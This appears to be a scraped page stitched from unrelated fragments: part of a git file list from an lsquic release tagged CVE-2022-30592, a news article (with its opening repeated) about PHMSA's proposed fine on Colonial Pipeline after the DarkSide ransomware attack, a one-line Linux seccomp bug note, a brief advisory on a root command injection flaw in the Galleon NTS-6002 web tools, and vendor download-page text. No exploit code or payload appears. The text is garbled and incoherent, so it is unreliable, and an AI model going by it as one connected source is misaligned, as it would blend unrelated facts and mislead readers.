270.  +1 −1 tests/test\_trechist.c
271.  +1 −1 tests/test\_varint.c
272.  +1 −1 tests/test\_ver\_nego.c
273.  +1 −1 tests/test\_wuf\_gquic\_be.c
274.  +1 −1 wincompat/README.txt
275.  +1 −1 wincompat/sys/queue.h
276.  +1 −1 wincompat/vc\_compat.h

CVE-2022-30592: Release 3.1.0 · litespeedtech/lsquic@a74702c

The U.S. Department of Transportation's Pipeline and Hazardous Materials Safety Administration (PHMSA) has proposed a penalty of nearly $1 million to Colonial Pipeline for violating federal safety regulations, worsening the impact of the ransomware attack last year.
The $986,400 penalty is the result of an inspection conducted by the regulator of the pipeline operator's control room management (

The U.S. Department of Transportation's Pipeline and Hazardous Materials Safety Administration (PHMSA) has proposed a penalty of nearly $1 million to Colonial Pipeline for violating federal safety regulations, worsening the impact of the ransomware attack last year.

The $986,400 penalty is the result of an inspection conducted by the regulator of the pipeline operator's control room management (CRM) procedures from January through November 2020.

The PHMSA said that "a probable failure to adequately plan and prepare for manual shutdown and restart of its pipeline system \[...\] contributed to the national impacts when the pipeline remained out of service after the May 2021 cyberattack."

Colonial Pipeline, operator of the largest U.S. fuel pipeline, was forced to temporarily take its systems offline in the wake of a DarkSide ransomware attack in early May 2021, disrupting gas supply and prompting a regional emergency declaration across 17 states.

The incident also saw the company shelling out $4.4 million in ransom to the cybercrime syndicate to regain access to its computer network, although the U.S. government managed to recover a significant chunk of the digital funds paid.

"The pipeline shutdown impacted numerous refineries' ability to move refined product, and supply shortages created wide-spread societal impacts long after the restart," PHMSA said in a Notice of Probable Violation and Proposed Compliance Order.

"Colonial Pipeline's ad-hoc approach toward consideration of a 'manual restart' created the potential for increased risks to the pipeline's integrity as well as additional delays in restart, exacerbating the supply issues and societal impacts."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

U.S. Proposes $1 Million Fine on Colonial Pipeline for Safety Violations After Cyberattack

Linux suffers from two bugs in PT_SUSPEND_SECCOMP. One allows for permission bypass and the other relates to a ptracer death race.

Linux PT_SUSPEND_SECCOMP Permission Bypass / Death Race

An issue was discovered in Galleon NTS-6002-GPS 4.14.103-Galleon-NTS-6002.V12 4. An authenticated attacker can perform command injection as root via shell metacharacters within the Network Tools section of the web-management interface. All three networking tools are affected (Ping, Traceroute, and DNS Lookup) and their respective input fields (ping_address, trace_address, nslookup_address).

**Software Download Page****Galleon's list of product web and User Manuals for download**

**SignalClocks**

Download PuTTY client.

PuTTY »

**Inova Clocks**

Download PuTTY client.

PuTTY »

**NTP Server Checker**

Welcome to the Free Galleon NTP server checker. This software is a test tool that acts as a client to a NTP server. The Galleon SNTP client reports on the responses it receives and allows you to check the accuracy and precision of a NTP time server. You can specify how many requests to send and how large the time between each. The SNTP server checker is easy to use and can test the accuracy and reliability of any NTP server.

NTP Server Checker Tool »

Galleon Systems NTP Time Servers and Network Clocks and Displays and are used by organizations world-wide and provide reliable synchronised time 24 hours a day 365 days a year! Here are just a few of our customers:

Tag

#acer